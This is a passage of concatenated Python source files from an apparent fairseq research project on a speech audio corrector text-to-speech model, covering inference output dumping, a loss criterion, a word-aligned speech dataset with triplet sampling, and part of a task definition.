attns = [to_np(hypo["attn"]) for hypo in hypos]
eos_probs = [to_np(hypo.get("eos_prob", None)) for hypo in hypos]
feat_preds = [to_np(hypo["feature"]) for hypo in hypos]
wave_preds = [to_np(resample_fn(h["waveform"])) for h in hypos]
if sample["words_and_speechreps"] is not None:
sac_friendly_texts = [sac_friendly_text(x, incl_codes=False) for x in sample["words_and_speechreps"]]
else:
sac_friendly_texts = [None for _ in hypos]
if dump_target:
feat_targs = [to_np(hypo["targ_feature"]) for hypo in hypos]
wave_targs = [to_np(resample_fn(h["targ_waveform"])) for h in hypos]
else:
feat_targs = [None for _ in hypos]
wave_targs = [None for _ in hypos]
# sort the samples in batch by the text seq
zipped = list(zip(sample_ids, texts, attns, eos_probs, feat_preds, wave_preds,
feat_targs, wave_targs, sac_friendly_texts))
# print("zipped text before sort", [tup[1] for tup in zipped])
if sort_by_text:
# strip_pointy_brackets so that the brackets are not considered when sorting
zipped = sorted(zipped, key=lambda tup: strip_pointy_brackets(tup[1]))
# print("zipped after sort", zipped)
# print("zipped after sort", list(zipped))
# print("zipped text after sort", [tup[1] for tup in zipped])
return zipped
def dedupe_adjacent(iterable, token_to_dedupe="<mask>"):
prev = object()
for item in iterable:
if item != token_to_dedupe:
prev = item
yield item
elif item != prev: # here item is equal to token_to_dedupe
prev = item
yield item
def dump_result(
is_na_model,
args,
count,
vocoder,
add_count_to_filename,
sample_id,
text,
attn,
eos_prob,
feat_pred,
wave_pred,
feat_targ,
wave_targ,
sac_friendly_text,
):
# add useful info to filename
if sample_id and sac_friendly_text:
filename_no_ext = f"{sample_id}-{sac_friendly_text}"
else:
if add_count_to_filename:
filename_no_ext = f"{count}-{text}"
else:
filename_no_ext = f"{text}"
sample_rate = args.output_sample_rate
out_root = Path(args.results_path)
if args.dump_features:
feat_dir = out_root / "feat"
feat_dir.mkdir(exist_ok=True, parents=True)
np.save(feat_dir / f"{filename_no_ext}.npy", feat_pred)
if args.dump_target:
feat_tgt_dir = out_root / "feat_tgt"
feat_tgt_dir.mkdir(exist_ok=True, parents=True)
np.save(feat_tgt_dir / f"{filename_no_ext}.npy", feat_targ)
if args.dump_attentions:
attn_dir = out_root / "attn"
attn_dir.mkdir(exist_ok=True, parents=True)
np.save(attn_dir / f"{filename_no_ext}.npy", attn.numpy())
if args.dump_eos_probs and not is_na_model:
eos_dir = out_root / "eos"
eos_dir.mkdir(exist_ok=True, parents=True)
np.save(eos_dir / f"{filename_no_ext}.npy", eos_prob)
if args.dump_plots:
images = [feat_pred.T] if is_na_model else [feat_pred.T, attn]
names = ["output"] if is_na_model else ["output", "alignment"]
if feat_targ is not None:
images = [feat_targ.T] + images
names = [f"target (idx={filename_no_ext})"] + names
if is_na_model:
plot_tts_output(images, names, attn, "alignment", suptitle=sac_friendly_text)
else:
plot_tts_output(images, names, eos_prob, "eos prob", suptitle=sac_friendly_text)
plot_dir = out_root / "plot"
plot_dir.mkdir(exist_ok=True, parents=True)
plt.savefig(plot_dir / f"{filename_no_ext}.png")
plt.close()
if args.dump_waveforms:
ext = args.audio_format
if wave_pred is not None:
wav_dir = out_root / f"{ext}_{sample_rate}hz_{vocoder}"
wav_dir.mkdir(exist_ok=True, parents=True)
sf.write(wav_dir / f"{filename_no_ext}.{ext}", wave_pred, sample_rate)
if args.dump_target and wave_targ is not None:
wav_tgt_dir = out_root / f"{ext}_{sample_rate}hz_{vocoder}_tgt"
wav_tgt_dir.mkdir(exist_ok=True, parents=True)
sf.write(wav_tgt_dir / f"{filename_no_ext}.{ext}", wave_targ, sample_rate)
def filter_utts_whose_words_do_not_have_speechreps(
utts,
dataset,
use_external_speechreps=False,
ignore_list=[]
):
missing_words = set()
new_utts = []
# print("DEBUG", list(dataset.word2speechreps.keys()))
for utt in utts:
for token in utt.split(" "):
if token.startswith("<") and token.endswith(">"):
word = token.lstrip("<").rstrip(">")
else:
word = token
w2sr = dataset.ext_word2speechreps if use_external_speechreps else dataset.word2speechreps
if word not in w2sr and word not in ignore_list:
missing_words.add(word)
break
else:
new_utts.append(utt)
if len(missing_words) > 0:
print(f"\nWARNING {len(missing_words)} (out of {len(utts)}) utts left out from inference. Words not in dataset.word2speechreps are:", missing_words)
# print(f"DEBUG", len(utts), len(new_utts))
return new_utts
def main(args):
assert(args.dump_features or args.dump_waveforms or args.dump_attentions
or args.dump_eos_probs or args.dump_plots)
if args.max_tokens is None and args.batch_size is None:
args.max_tokens = 8000
logger.info(args)
# setup model and task
use_cuda = torch.cuda.is_available() and not args.cpu
task = tasks.setup_task(args)
models, saved_cfg, task = checkpoint_utils.load_model_ensemble_and_task(
[args.path],
task=task,
)
model = models[0].cuda() if use_cuda else models[0]
# use the original n_frames_per_step
task.args.n_frames_per_step = saved_cfg.task.n_frames_per_step
# if args.txt_file:
# # TODO combine train dev and test so we have more options of word-aligned speech reps to choose from?
# task.load_dataset(args.gen_subset, task_cfg=saved_cfg.task)
# else:
# task.load_dataset(args.gen_subset, task_cfg=saved_cfg.task)
task.load_dataset(args.gen_subset, task_cfg=saved_cfg.task)
data_cfg = task.data_cfg
# set resampling function for post processing of model outputs
sample_rate = data_cfg.config.get("features", {}).get("sample_rate", 22050)
resample_fn = {
False: lambda x: x,
True: lambda x: torchaudio.sox_effects.apply_effects_tensor(
x.detach().cpu().unsqueeze(0), sample_rate,
[['rate', str(args.output_sample_rate)]]
)[0].squeeze(0)
}.get(args.output_sample_rate != sample_rate)
if args.output_sample_rate != sample_rate:
logger.info(f"resampling to {args.output_sample_rate}Hz")
generator = task.build_generator([model], args)
dataset = task.dataset(args.gen_subset)
if args.txt_file:
# generate test sentences in txt file (WARNING: do not have underlying ground truth audio for obj eval!)
with open(args.txt_file, 'r') as f:
test_utts = [l.rstrip("\n") for l in f.readlines() if l != "\n" and not l.startswith("#")]
print("test_utts", test_utts)
print("args.use_external_speechreps", args.use_external_speechreps)
test_utts = filter_utts_whose_words_do_not_have_speechreps(
test_utts,
dataset,
use_external_speechreps=args.use_external_speechreps,
ignore_list=["how", "is", "pronounced"]
)
# create mini-batches with given size constraints
itr = dataset.batch_from_utts(
test_utts,
dataset,
batch_size=args.batch_size,
use_external_speechreps=args.use_external_speechreps
)
else:
# generate from a subset of corpus (usually test, but can specify train or dev)
itr = task.get_batch_iterator(
dataset=dataset,
max_tokens=args.max_tokens,
max_sentences=args.batch_size,
max_positions=(sys.maxsize, sys.maxsize),
ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,
required_batch_size_multiple=args.required_batch_size_multiple,
num_shards=args.num_shards,
shard_id=args.shard_id,
num_workers=args.num_workers,
data_buffer_size=args.data_buffer_size,
).next_epoch_itr(shuffle=False)
# output to different directory if using external speechreps
if args.use_external_speechreps:
args.results_path = os.path.join(args.results_path, 'ext_speechreps')
Path(args.results_path).mkdir(exist_ok=True, parents=True)
is_na_model = getattr(model, "NON_AUTOREGRESSIVE", False)
vocoder = task.args.vocoder
count = 0
with progress_bar.build_progress_bar(args, itr) as t:
for sample in t:
# print("DEBUG", sample["src_texts"])
sample = utils.move_to_cuda(sample) if use_cuda else sample
hypos = generator.generate(model, sample, has_targ=args.dump_target)
for result in postprocess_results(
dataset, sample, hypos, resample_fn, args.dump_target,
sort_by_text=True if args.txt_file else False,
):
count += 1
dump_result(is_na_model, args, count, vocoder, args.add_count_to_filename, *result)
print(f"*** Finished SAC generation of {count} items ***")
def cli_main():
parser = make_parser()
args = options.parse_args_and_arch(parser)
main(args)
if __name__ == "__main__":
cli_main()
```
#### File: fairseq/criterions/sac_loss.py
```python
import logging
from typing import Any, Dict, List
from functools import lru_cache
from dataclasses import dataclass, field
import torch
from omegaconf import II
from fairseq import metrics, utils
from fairseq.criterions import FairseqCriterion, register_criterion
from fairseq.dataclass import FairseqDataclass
from fairseq.data.data_utils import lengths_to_mask
import torch.nn.functional as F
from fairseq.criterions.tacotron2_loss import (
Tacotron2CriterionConfig,
Tacotron2Criterion,
GuidedAttentionLoss,
)
logger = logging.getLogger(__name__)
@dataclass
class SACCriterionConfig(Tacotron2CriterionConfig):
pass
@register_criterion("sac_tts", dataclass=SACCriterionConfig)
class SACCriterion(Tacotron2Criterion):
def forward(self, model, sample, reduction="mean"):
bsz, max_len, _ = sample["target"].size()
feat_tgt = sample["target"]
feat_len = sample["target_lengths"].view(bsz, 1).expand(-1, max_len)
eos_tgt = torch.arange(max_len).to(sample["target"].device)
eos_tgt = eos_tgt.view(1, max_len).expand(bsz, -1)
eos_tgt = (eos_tgt == (feat_len - 1)).float()
src_tokens = sample["net_input"]["src_tokens"]
src_word_pos = sample["net_input"]["src_word_pos"]
src_segments = sample["net_input"]["src_segments"]
src_lens = sample["net_input"]["src_lengths"]
tgt_lens = sample["target_lengths"]
feat_out, eos_out, extra = model(
src_tokens=src_tokens,
src_word_pos=src_word_pos,
src_segments=src_segments,
src_lengths=src_lens,
prev_output_tokens=sample["net_input"]["prev_output_tokens"],
incremental_state=None,
target_lengths=tgt_lens,
speaker=sample["speaker"]
)
l1_loss, mse_loss, eos_loss = self.compute_loss(
extra["feature_out"], feat_out, eos_out, feat_tgt, eos_tgt,
tgt_lens, reduction,
)
attn_loss = torch.tensor(0.).type_as(l1_loss)
if self.guided_attn is not None:
attn_loss = self.guided_attn(extra['attn'], src_lens, tgt_lens, reduction)
ctc_loss = torch.tensor(0.).type_as(l1_loss)
if self.ctc_weight > 0.:
net_output = (feat_out, eos_out, extra)
lprobs = model.get_normalized_probs(net_output, log_probs=True)
lprobs = lprobs.transpose(0, 1) # T x B x C
src_mask = lengths_to_mask(src_lens)
src_tokens_flat = src_tokens.masked_select(src_mask)
ctc_loss = F.ctc_loss(
lprobs, src_tokens_flat, tgt_lens, src_lens,
reduction=reduction, zero_infinity=True
) * self.ctc_weight
loss = l1_loss + mse_loss + eos_loss + attn_loss + ctc_loss
sample_size = sample["nsentences"] if self.sentence_avg \
else sample["ntokens"]
logging_output = {
"loss": utils.item(loss.data),
"ntokens": sample["ntokens"],
"nsentences": sample["nsentences"],
"sample_size": sample_size,
"l1_loss": utils.item(l1_loss.data),
"mse_loss": utils.item(mse_loss.data),
"eos_loss": utils.item(eos_loss.data),
"attn_loss": utils.item(attn_loss.data),
"ctc_loss": utils.item(ctc_loss.data),
"seg_emb_alpha": utils.item(model.encoder.seg_emb_alpha),
"pos_emb_alpha": utils.item(model.encoder.pos_emb_alpha),
}
if not model.encoder.no_word_pos:
logging_output["word_pos_emb_alpha"] = utils.item(model.encoder.word_pos_emb_alpha),
return loss, sample_size, logging_output
@classmethod
def reduce_metrics(cls, logging_outputs: List[Dict[str, Any]]) -> None:
ns = [log.get("sample_size", 0) for log in logging_outputs]
ntot = sum(ns)
ws = [n / (ntot + 1e-8) for n in ns]
# log metrics that should be summed
for key in ["loss", "l1_loss", "mse_loss", "eos_loss", "attn_loss", "ctc_loss"]:
vals = [log.get(key, 0) for log in logging_outputs]
val = sum(val * w for val, w in zip(vals, ws))
metrics.log_scalar(key, val, ntot, round=3)
# log other metrics
seg_emb_alpha = logging_outputs[0].get("seg_emb_alpha", 0)
pos_emb_alpha = logging_outputs[0].get("pos_emb_alpha", 0)
metrics.log_scalar("seg_emb_alpha", seg_emb_alpha, 0)
metrics.log_scalar("pos_emb_alpha", pos_emb_alpha, 0)
# inference metrics
if "targ_frames" not in logging_outputs[0]:
return
n = sum(log.get("targ_frames", 0) for log in logging_outputs)
for key, new_key in [
("mcd_loss", "mcd_loss"),
("pred_frames", "pred_ratio"),
("nins", "ins_rate"),
("ndel", "del_rate"),
]:
val = sum(log.get(key, 0) for log in logging_outputs)
metrics.log_scalar(new_key, val / n, n, round=3)
```
#### File: data/audio/word_aligned_audio_dataset.py
```python
from fairseq.data import FairseqDataset
# from .. import FairseqDataset
import logging
import numpy as np
import os
import pyarrow
import re
import torch
import random
from collections import defaultdict
from tqdm import tqdm
logger = logging.getLogger(__name__)
def verify_size(reps):
# check dimensions and change them if necessary
if reps.dim() == 3:
# we assume (batch, timesteps, hidden_size)
reps = reps.squeeze(0) # squeeze away batch dimension
assert reps.dim() == 2
elif reps.dim() == 2:
pass # all is good!
else:
raise ValueError("speech representations have an incorrect number of dimensions")
return reps
def get_timesteps_from_filename(filename):
# grep out length
matches = re.findall(r'len(\d+)', filename)
assert len(matches) == 1
return matches[0]
def random_sampling(a_list, num_samples):
if num_samples >= len(a_list):
return a_list
else:
return random.sample(a_list, num_samples)
def zeropad_to_len(t, targ_len):
len_diff = targ_len - t.size(0)
if t.dim() == 1:
zero_padded_t = torch.cat([t, t.new_zeros(len_diff)])
elif t.dim() == 2:
zero_padded_t = torch.cat([t, t.new_zeros(len_diff, t.size(1))])
else:
raise ValueError
return zero_padded_t, len_diff
class WordAlignedAudioDataset(FairseqDataset):
"""
A dataset that maps between word-tokens in a corpus to their speech representations.
Speech aligned at the word-level can be represented as any two dimensional matrix of shape (timesteps, dimensions).
E.g.:
- mel-spectrograms (timesteps, number of mel bins)
- wav2vec2.0 representations (timesteps, hidden size of wav2vec2.0 representations)
The dataset is structured as a key-value mapping:
- key: An index from 0 to the total number of tokens in a corpus.
Subsequently the index uniquely identifies any token in the corpus
- value: A dictionary associated with that token. That contains:
- path to a token's speech representations
- the token's graphemes
This dataset also contains a mapping between a word in its graphemic form and its examples in the corpus.
This is used to speed up the retrieval of positive and negative examples for triplet loss/contrastive training.
The data_path is the path to the speech corpus rearranged and cut at the word-level,
it should have the following structure (please refer to fairseq/examples/lexicon_learner/wordalign_speechreps.py):
- data_path
- word1
- word1_LJ010-0292_001.pt
- word1_LJ010-0292_002.pt
- ...
- word2
- word2_LJ001-0012_001.pt
- word2_LJ002-0024_001.pt
- ...
- ...
- word1, word2, ... subfolders refer to a particular wordtype in the corpus.
- .pt files contain speech representations that map to a particular example of a wordtype.
It is named as:
<wordtype>_<utt id>_occ<numbered occurrence in the utterance>_len<num of timesteps in sequence>.pt
Training set:
Validation set:
Seen:
Unseen:
"""
def __init__(
self,
data_path,
split,
save_dir,
cache_all_data=True, # warning doing so with large datasets could lead to OOM!
max_train_wordtypes=None, # leave as None to use as many wordtypes as possible for training
max_train_examples_per_wordtype=None, # leave as None to use all examples for each wordtype
min_train_examples_per_wordtype=2,
valid_seen_wordtypes=100, # how many wordtypes seen during training to include in validation
valid_unseen_wordtypes=100, # how many wordtypes to leave out of training and include in validation
valid_examples_per_wordtype=25, # for valid-seen and valid-unseen
randomise_wordtypes=True,
random_seed=1337,
wordtypes_to_ignore=('SIL', '<unk>'),
debug_only_include_words_beginning_with=None,
padding_index_offset=1,
):
super().__init__()
logger.info(f"Creating dataset...")
# valid-seen is by definition a subset of the training dataset
if max_train_wordtypes is not None and max_train_wordtypes < valid_seen_wordtypes:
raise ValueError(f"max_train_wordtypes ({max_train_wordtypes}) < valid_seen_wordtypes ({valid_seen_wordtypes})")
# need at least 2 examples for training and 2 for validation (2+2=4)
# so that we can pull at least 1 positive example during training and validation for a wordtype
assert min_train_examples_per_wordtype >= 2
assert valid_examples_per_wordtype >= 2
min_examples_per_wordtype = min_train_examples_per_wordtype + valid_examples_per_wordtype
# if max_train_examples_per_wordtype is not None:
# assert max_train_examples_per_wordtype >= min_examples_per_wordtype, f"At least {min_examples_per_wordtype} examples needed to draw a positive example for a given anchor during either training or validation. (max_train_examples_per_wordtype={max_train_examples_per_wordtype})"
# check data split
if split == "test":
raise NotImplementedError
if split not in ["train", "valid-seen", "valid-unseen"]:
raise ValueError(f"'{split}' not a correct dataset split.")
################################################################################################################
### Open main data folder and load word-aligned speech reps for all words in the vocab
self.examples = [] # each example is a filepath to some reps, or the representations themselves
self.sizes = []
all_indices = []
self.cache_all_data = cache_all_data
self.padding_index_offset = padding_index_offset
# create a mapping between a wordtype and a list of positive examples of that wordtype
# this data structure is used to quickly find positive and negative examples for a particular word token
self.wordtype2indices = defaultdict(set)
# load all subfolders (each of which correspond to a unique wordtype)
all_subfolders = sorted(os.listdir(data_path))
# (for debugging) optionally only include wordtypes that start with a certain letter to speed up debugging
if debug_only_include_words_beginning_with is not None:
all_subfolders = [w for w in all_subfolders if w.startswith(debug_only_include_words_beginning_with)]
# optionally randomise the order so its not alphabetical
if randomise_wordtypes:
random.seed(random_seed)
random.shuffle(all_subfolders)
# skip wordtypes we wish to ignore
for w in wordtypes_to_ignore:
if w in all_subfolders:
all_subfolders.remove(w)
# skip any wordtypes from consideration if they do not have enough examples
skipped_wordtypes = []
logger.info(f"Skipping wordtypes that do not have enough examples...")
for wordtype in tqdm(all_subfolders, unit='wordtype'):
all_wordtoken_files = os.listdir(os.path.join(data_path, wordtype))
if len(all_wordtoken_files) < min_examples_per_wordtype:
skipped_wordtypes.append(wordtype)
for w in skipped_wordtypes:
all_subfolders.remove(w)
logger.info(f"Did not include {len(skipped_wordtypes)} wordtypes because they have fewer than {min_examples_per_wordtype} examples.")
# calculate start and end wordtype indices depending on the dataset split/split subset
if split == "train":
start_wordtype_idx = 0
if max_train_wordtypes is None:
end_wordtype_idx = len(all_subfolders) - valid_unseen_wordtypes
else:
if len(all_subfolders) >= max_train_wordtypes + valid_unseen_wordtypes:
end_wordtype_idx = max_train_wordtypes
else:
end_wordtype_idx = len(all_subfolders) - valid_unseen_wordtypes
elif split == "valid-seen":
start_wordtype_idx = 0
end_wordtype_idx = valid_seen_wordtypes
elif split == "valid-unseen":
start_wordtype_idx = -valid_unseen_wordtypes
end_wordtype_idx = None
else:
raise ValueError(f"'{split}' not a correct dataset split or dataset split subset.")
wordtype_to_incl_idx = 0
for wordtype in tqdm(all_subfolders[start_wordtype_idx:end_wordtype_idx], unit='wordtype'):
all_wordtoken_files = os.listdir(os.path.join(data_path, wordtype))
all_wordtoken_files = sorted(all_wordtoken_files) # ensure consistent ordering
# calculate start and end wordtoken indices depending on the dataset split/split subset
if split in ["train"]:
start_wordtoken_idx = 0
if max_train_examples_per_wordtype is None:
end_wordtoken_idx = len(all_wordtoken_files) - valid_examples_per_wordtype
else:
if len(all_wordtoken_files) >= max_train_examples_per_wordtype + valid_examples_per_wordtype:
end_wordtoken_idx = max_train_examples_per_wordtype
else:
end_wordtoken_idx = len(all_wordtoken_files) - valid_examples_per_wordtype
elif split in ["valid-seen", "valid-unseen"]:
start_wordtoken_idx = -valid_examples_per_wordtype
end_wordtoken_idx = None
else:
raise ValueError(f"'{split}' not a correct dataset split or dataset split subset.")
for wordtoken_file in all_wordtoken_files[start_wordtoken_idx:end_wordtoken_idx]:
filepath = os.path.join(data_path, wordtype, wordtoken_file)
# assign data associated with this word token / index
self.sizes.append(int(get_timesteps_from_filename(wordtoken_file)))
self.examples.append(filepath)
self.wordtype2indices[wordtype].add(wordtype_to_incl_idx)
all_indices.append(wordtype_to_incl_idx)
wordtype_to_incl_idx += 1
# cache all data in order to avoid accessing disk (locally or network) during training
# (more feasible when loading smaller data formats such as hubert codes vs full wav2vec2.0 vectors)
if self.cache_all_data:
self.cached_data = []
logger.info(f"Caching {len(self.examples)} examples.")
for fp in tqdm(self.examples):
self.cached_data.append(torch.load(fp).int() + self.padding_index_offset)
# Sanity checks
assert all_indices == list(range(len(self.examples)))
assert_msg = f"len(self.sizes)=={len(self.sizes)}, len(self.fnames)=={len(self.examples)}, sum(len(v) for v in " \
f"self.wordtype2indices.values())=={sum(len(v) for v in self.wordtype2indices.values())}, idx + 1=={wordtype_to_incl_idx} "
assert len(self.sizes) == len(self.examples) == sum(
len(v) for v in self.wordtype2indices.values()) == wordtype_to_incl_idx, assert_msg
# Assign object params
self.sizes = np.array(self.sizes, dtype=np.int64)
self.all_indices = set(all_indices)
# self.examples = pyarrow.array(self.examples) # uncomment to increase performance using pyarrow
# Print/save important information and stats about this dataset
logger.info(f"Finished creating word-aligned speech representations {split} dataset containing {len(self.wordtype2indices)} wordtypes "
f"and {len(self.examples)} word tokens in total.")
if split in ["valid-seen", "valid-unseen"]:
logger.info(f"{split} wordtypes are: {' '.join(self.wordtype2indices.keys())}")
self.save_wordtypes_to_disk(os.path.join(save_dir, f'{split}_{len(self.wordtype2indices.keys())}_wordtypes.csv'))
def __getitem__(self, anchor_index):
positive_index = list(self.get_positive_indices(anchor_index, num_examples=1))[0]
negative_index = list(self.get_negative_indices(anchor_index, num_examples=1))[0]
# load inputs
if self.cache_all_data:
anchor_in = self.cached_data[anchor_index]
positive_in = self.cached_data[positive_index]
negative_in = self.cached_data[negative_index]
else:
anchor_in = torch.load(self.examples[anchor_index]).int() + self.padding_index_offset # TODO warning this will not work with continuous reps!
positive_in = torch.load(self.examples[positive_index]).int() + self.padding_index_offset
negative_in = torch.load(self.examples[negative_index]).int() + self.padding_index_offset
# create tensors for indicating where we want to output targets
# e.g. 1 in timesteps where there is a grapheme and 0 where we do not have a grapheme
# (padding will be performed later by collater)
anchor_tgt = torch.ones(self.get_tgt_len(anchor_index, units="graphemes"), dtype=torch.int)
positive_tgt = torch.ones(self.get_tgt_len(positive_index, units="graphemes"), dtype=torch.int)
negative_tgt = torch.ones(self.get_tgt_len(negative_index, units="graphemes"), dtype=torch.int)
# print("debug", self.index2wordtype(anchor_index), anchor_tgt)
return {
"anchor_index": anchor_index,
"positive_index": positive_index,
"negative_index": negative_index,
"anchor_in": anchor_in, # e.g. speech reps of the anchor word
"positive_in": positive_in,
"negative_in": negative_in,
"anchor_tgt": anchor_tgt,
"positive_tgt": positive_tgt,
"negative_tgt": negative_tgt,
}
def get_tgt_len(self, wordtoken_index, units="graphemes"):
"""
return the length of some metadata related to the wordtype associated with a wordtoken
e.g. number of graphemes or phonemes of that wordtype
"""
if units == "graphemes":
tgt_len = len(self.index2wordtype(wordtoken_index))
elif units == "phones":
raise NotImplementedError
else:
raise ValueError
return tgt_len
def __len__(self):
return len(self.examples)
def index2wordtype(self, index):
filepath = self.examples[index]
wordtype = filepath.split('/')[-2]
return wordtype
def get_all_indices_for_wordtype(self, index):
wordtype = self.index2wordtype(index)
all_indices_for_wordtype = self.wordtype2indices[wordtype]
return all_indices_for_wordtype
def get_positive_indices(self, anchor_index, num_examples=1):
"""
For a given word token indicated by its index
return a set of the indices of positive examples (word tokens of the SAME wordtype but not the same token!)
"""
all_indices_for_wordtype = self.get_all_indices_for_wordtype(anchor_index)
positive_indices = all_indices_for_wordtype - {anchor_index}
return random_sampling(positive_indices, num_examples)
def get_negative_indices(self, anchor_index, num_examples=1):
"""
For a given word token indicated by its index
return a set of the indices of negative examples (word tokens of a DIFFERENT wordtype)
"""
all_indices_for_anchor = set(self.get_all_indices_for_wordtype(anchor_index))
negative_indices = self.all_indices - all_indices_for_anchor
return random_sampling(negative_indices, num_examples)
def collater(self, samples):
"""Merge a list of samples to form a mini-batch.
Args:
samples (List[dict]): samples to collate
Returns:
dict: a mini-batch suitable for forwarding with a Model
Acoustic lexicon learner specific:
- Zero pads anchor, positive, and negative inputs so that all items in the batch are the same size
"""
if len(samples) == 0:
return {}
# # get indices
# anchor_indices = torch.tensor([s["anchor_index"] for s in samples], dtype=torch.long)
# positive_indices = torch.tensor([s["positive_index"] for s in samples], dtype=torch.long)
# negative_indices = torch.tensor([s["negative_index"] for s in samples], dtype=torch.long)
# # get wordtypes just for anchor words
# anchor_wordtypes = [self.index2wordtype(idx) for idx in anchor_indices]
collated_inputs, in_lengths = self.collate_anchor_positive_negative_tensors(samples, feat_type='in')
collated_tgts, tgt_lengths = self.collate_anchor_positive_negative_tensors(samples, feat_type='tgt')
return {
"net_input": {
"src_tokens": collated_inputs,
"tgt_tokens": collated_tgts,
# "src_lengths": in_lengths,
"tgt_lengths": tgt_lengths,
},
"sample_size": in_lengths.sum().item(),
# "anchor_indices": anchor_indices,
# "positive_indices": positive_indices,
# "negative_indices": negative_indices,
# "anchor_wordtypes": anchor_wordtypes,
# "nsentences": len(samples),
# "ntokens": sum(len(s["source"]) for s in samples),
# "target": target,
}
def collate_anchor_positive_negative_tensors(self, samples, feat_type):
"""
collate anchor positive and negative for a given feat in samples
feat_type could be:
"in" for inputs
"tgt" for targets
for example
"""
# get speech representation inputs, and place in lists
anchor_tensors = [s[f"anchor_{feat_type}"] for s in samples]
positive_tensors = [s[f"positive_{feat_type}"] for s in samples]
negative_tensors = [s[f"negative_{feat_type}"] for s in samples]
# zero pad according to the longest sequence among anchor, positive, or negative inputs.
# get timesteps of each input before performing zero padding for batching
# so that we know what the maximum length of the tensor should be
anchor_szs = torch.tensor([s[f"anchor_{feat_type}"].size(0) for s in samples], dtype=torch.long)
positive_szs = torch.tensor([s[f"positive_{feat_type}"].size(0) for s in samples], dtype=torch.long)
negative_szs = torch.tensor([s[f"negative_{feat_type}"].size(0) for s in samples], dtype=torch.long)
max_len = torch.max(torch.cat([anchor_szs, positive_szs, negative_szs])).item()
# create 0s tensor
b_sz = 3 * len(samples)
if samples[0][f"anchor_{feat_type}"].dim() == 1: # discrete
collated_tensor = torch.zeros(b_sz, max_len, dtype=torch.int)
elif samples[0][f"anchor_{feat_type}"].dim() == 2: # continuous
hid_dim = samples[0][f"anchor_{feat_type}"].size(1)
collated_tensor = torch.zeros(b_sz, max_len, hid_dim, dtype=torch.float)
else:
raise ValueError
# print("collated_tensor.size()", collated_tensor.size())
lengths = torch.zeros(b_sz, dtype=torch.int64)
# populate with data, group by anchors, positives, negatives
for i, anchor_t in enumerate(anchor_tensors):
# print("anchor", i)
collated_tensor[i], _ = zeropad_to_len(anchor_t, max_len)
lengths[i] = anchor_t.size(0)
for i, positive_t in enumerate(positive_tensors, start=len(samples)):
# print("positive", i)
collated_tensor[i], _ = zeropad_to_len(positive_t, max_len)
lengths[i] = positive_t.size(0)
for i, negative_t in enumerate(negative_tensors, start=2*len(samples)):
# print("negative", i)
collated_tensor[i], _ = zeropad_to_len(negative_t, max_len)
lengths[i] = negative_t.size(0)
return collated_tensor, lengths
def num_tokens(self, index):
"""Return the number of tokens in a sample. This value is used to
enforce ``--max-tokens`` during batching."""
return self.size(index)
def size(self, index):
"""Return an example's size as a float or tuple. This value is used when
filtering a dataset with ``--max-positions``."""
return self.sizes[index]
def ordered_indices(self):
"""Return an ordered list of indices. Batches will be constructed based
on this order."""
return np.arange(len(self), dtype=np.int64)
def save_wordtypes_to_disk(self, save_path):
"""Save wordtypes in this datasplit to disk"""
with open(save_path, 'w') as f:
f.write(','.join(self.wordtype2indices.keys()))
logger.info(f"Successfully saved wordtypes to '{save_path}'")
def test():
logging.basicConfig(format="[%(filename)s:%(lineno)s - %(funcName)20s() ] %(message)s")
logger.setLevel(logging.INFO)
# test dataset creation
data_path = '/home/s1785140/data/ljspeech_wav2vec2_reps/wav2vec2-large-960h/layer-15/word_level/'
dataset = WordAlignedAudioDataset(
data_path,
max_train_wordtypes=100,
max_train_examples_per_wordtype=5,
)
# for i in range(len(dataset)):
# print(dataset.index2wordtype(i))
def print_words_for_indices(indices):
print(", ".join(f"{j}:{dataset.index2wordtype(j)}" for j in indices))
# test retrieval of +ve and -ve indices
print_words_for_indices(dataset.get_positive_indices(anchor_index=0, num_examples=10))
print_words_for_indices(dataset.get_negative_indices(anchor_index=0, num_examples=10))
list_of_samples = []
# test __getitem__()
for i, sample in enumerate(dataset):
print(sample)
list_of_samples.append(sample)
if i > 5:
break
# test collater
collate_rv = dataset.collater(list_of_samples)
print(collate_rv['anchor_indices'])
if __name__ == '__main__':
"""
to test, run:
python /home/s1785140/fairseq/fairseq/data/audio/word_aligned_audio_dataset.py
"""
test()
```
#### File: fairseq/tasks/speech_audio_corrector.py
```python
import logging
import os
import os.path as op
import torch
import torch.nn.functional as F
import numpy as np
from fairseq.data.audio.speech_audio_corrector_dataset import SpeechAudioCorrectorDatasetCreator
from fairseq.tasks import register_task
from fairseq.tasks.text_to_speech import TextToSpeechTask
from fairseq.speech_generator import (
AutoRegressiveSpeechGenerator, NonAutoregressiveSpeechGenerator,
TeacherForcingAutoRegressiveSpeechGenerator, SACAutoRegressiveSpeechGenerator
)
from fairseq.data import Dictionary
from pathlib import Path
from fairseq.data.audio.speech_to_text_dataset import (
S2TDataConfig,
)
logging.basicConfig(
format='%(asctime)s | %(levelname)s | %(name)s | %(message)s',
datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO
)
logger = logging.getLogger(__name__)
try:
from tensorboardX import SummaryWriter
except ImportError:
logger.info("Please install tensorboardX: pip install tensorboardX")
SummaryWriter = None
#TODO add args from CLA
#TODO randomise_examples
@register_task('speech_audio_corrector')
class SpeechAudioCorrectorTask(TextToSpeechTask):
@classmethod
def add_args(cls, parser):
super(SpeechAudioCorrectorTask, cls).add_args(parser)
parser.add_argument("--randomise-examples", action="store_true",)
# parser.add_argument("--incl-external-speechreps", action="store_true",)
def __init__(self, args, src_dict):
super().__init__(args, src_dict)
self.args = args
# add symbols for SAC to dictionary
self.src_dict.add_symbol("<mask>")
K=100
for i in range(K):
# add to src_dict entries for hubert codes i.e. HUB0, HUB1, ..., HUB<k-1>
self.src_dict.add_symbol(f"HUB{i}")
# print entire dictionary should be graphemes + hubert codes
print("(symbol, index) mapping in dictionary for Speech Audio Corrector Training:")
print([(symbol, src_dict.index(symbol)) for symbol in src_dict.symbols])
def load_dataset(self, split, epoch=1, combine=False, **kwargs):
is_train_split = split.startswith('train')
pre_tokenizer = self.build_tokenizer(self.args)
bpe_tokenizer = self.build_bpe(self.args)
self.datasets[split] = SpeechAudioCorrectorDatasetCreator.from_tsv(
self.args,
self.args.data, self.data_cfg, split, self.src_dict,
pre_tokenizer, bpe_tokenizer, is_train_split=is_train_split,
epoch=epoch, seed=self.args.seed,
n_frames_per_step=self.args.n_frames_per_step,
speaker_to_id=self.speaker_to_id,
)
def build_generator(self, models, cfg, vocoder=None, **unused):
if vocoder is None:
vocoder = self.build_default_vocoder()
model = models[0]
if getattr(model, "NON_AUTOREGRESSIVE", False):
return NonAutoregressiveSpeechGenerator(
